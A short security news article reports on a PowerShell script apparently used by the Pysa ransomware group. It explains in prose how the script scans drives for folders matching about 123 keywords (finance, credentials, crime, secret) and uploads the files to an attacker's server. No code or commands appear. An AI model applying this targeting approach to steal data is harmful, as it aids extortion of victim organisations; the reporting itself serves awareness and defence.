Ransomware PowerShell script sheds light on hacker tactics

A PowerShell script used by the ransomware group Pysa has shed light on the types of data that cybercriminals try to steal during their attacks.

When ransomware operators break into a network, they usually start with limited access to one device. They then use various tools and exploits to steal other credentials or gain elevated privileges on different devices. Once they gain access to a Windows domain controller, they search for and steal data before encrypting devices.

Attackers use stolen data to determine the amount of ransom required based on the company's revenues and insurance policies, and to intimidate the victim into paying the ransom under threat of data breach.

The MalwareHunterTeam team has shared with the BleepingComputer edition a PowerShell script used by the ransomware group Pysa to find and steal data from the server. The script is designed to scan each disk for data folders, the names of which correspond to specific strings on the device. If the folder matches the search criteria, the script will upload the folder's files to a remote server under the control of the attacker.

Of particular interest are 123 keywords, which give an idea of ​​what data the ransomware operators consider valuable. The script looks for files related to financial or confidential company information such as audit, banking information, credentials, tax forms, student information, social security numbers, and SEC documents.

However, it also looks for more intriguing keywords that could be especially dangerous to the company in the event of a leak, such as folders containing the words crime, investigation, fraud, bureau, federal, hidden. "Secret", "illegal" and "terror".

Previous Post Next Post